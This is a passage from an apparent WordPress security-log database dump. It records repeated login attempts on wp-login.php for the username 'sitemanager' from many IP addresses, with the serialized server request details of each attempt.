Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55750\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746055208.6403871;s:12:\"REQUEST_TIME\";i:1746055208;}}','173.212.207.177',0,'2025-05-01 04:50:10','1970-01-01 00:00:00'),(94730,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49962\";s:11:\"REMOTE_ADDR\";s:11:\"89.45.83.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746055514.214571;s:12:\"REQUEST_TIME\";i:1746055514;}}','89.45.83.89',0,'2025-05-01 04:55:15','1970-01-01 00:00:00'),(94731,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39608\";s:11:\"REMOTE_ADDR\";s:13:\"160.25.166.79\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746055823.09956;s:12:\"REQUEST_TIME\";i:1746055823;}}','160.25.166.79',0,'2025-05-01 05:00:24','1970-01-01 00:00:00'),(94732,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44780\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746056133.4828;s:12:\"REQUEST_TIME\";i:1746056133;}}','199.188.201.172',0,'2025-05-01 05:05:35','1970-01-01 00:00:00'),(94733,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59620\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746056445.8589561;s:12:\"REQUEST_TIME\";i:1746056445;}}','23.239.27.53',0,'2025-05-01 05:10:47','1970-01-01 00:00:00'),(94734,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47036\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.121.149\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746056751.1101761;s:12:\"REQUEST_TIME\";i:1746056751;}}','68.65.121.149',0,'2025-05-01 05:15:52','1970-01-01 00:00:00'),(94735,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50536\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746057063.685271;s:12:\"REQUEST_TIME\";i:1746057063;}}','15.204.43.173',0,'2025-05-01 05:21:05','1970-01-01 00:00:00'),(94736,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47728\";s:11:\"REMOTE_ADDR\";s:11:\"89.28.217.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746057374.4072371;s:12:\"REQUEST_TIME\";i:1746057374;}}','89.28.217.3',0,'2025-05-01 05:26:16','1970-01-01 00:00:00'),(94737,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"1120\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746057688.250504;s:12:\"REQUEST_TIME\";i:1746057688;}}','91.151.95.70',0,'2025-05-01 05:31:30','1970-01-01 00:00:00'),(94738,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"13530\";s:11:\"REMOTE_ADDR\";s:11:\"78.135.87.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746058002.9821019;s:12:\"REQUEST_TIME\";i:1746058002;}}','78.135.87.2',0,'2025-05-01 05:36:44','1970-01-01 00:00:00'),(94739,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36922\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746058311.612457;s:12:\"REQUEST_TIME\";i:1746058311;}}','54.39.48.216',0,'2025-05-01 05:41:53','1970-01-01 